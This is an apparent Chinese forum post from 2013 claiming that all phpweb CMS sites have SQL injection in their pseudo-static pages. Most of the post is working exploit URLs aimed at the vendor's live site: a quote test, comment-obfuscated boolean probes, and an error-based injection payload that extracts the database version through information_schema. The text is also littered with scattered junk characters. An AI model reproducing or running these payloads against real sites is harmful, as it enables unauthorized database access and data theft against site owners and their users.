phpweb所有的整站程序伪静态页面都存在sql注入
1 n+ p- N1 T# y1 M G
. b3 t) N1 N2 J$ _主站:http://phpweb.net/( p, Q- L b8 Z+ F" ?
加’检测:' E) _( m; S0 {: O
) z% v# m- O+ N/ b' |6 ?http://www.phpweb.net/down/html/?772′.html4 w: n$ o) m# E2 L8 o5 h; v
- J d# q( k6 M |/ _- e" n# o$ n出错. n9 ^, t" _! |) ]% A
存在注入。
. V/ P1 Y' m8 Z不能用空格,只能用/*罗) x8 p" v9 O9 W" M1 a
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
2 l2 i- R- a- p! {/ W+ P
2 s1 h8 `2 t( ~* X; f0 xhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
& @; e$ V- B8 K: ~. T( A; i4 M爆数据库版本:
& i' E) t3 u- X% a
* v3 ?; ^5 U4 `! M* p. \5 T! R( Q& I?
8 C3 ~ v; m: I! J" [& ]6 Z8 c e1! T/ L# S' v2 s) H$ W
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
* V! Z: b5 C, q: `5 z更新日期: 2013-01-03 13:39:50 5 R3 I6 h$ M# h
|
发表于 2013-1-4 19:46:42
收藏
支持
反对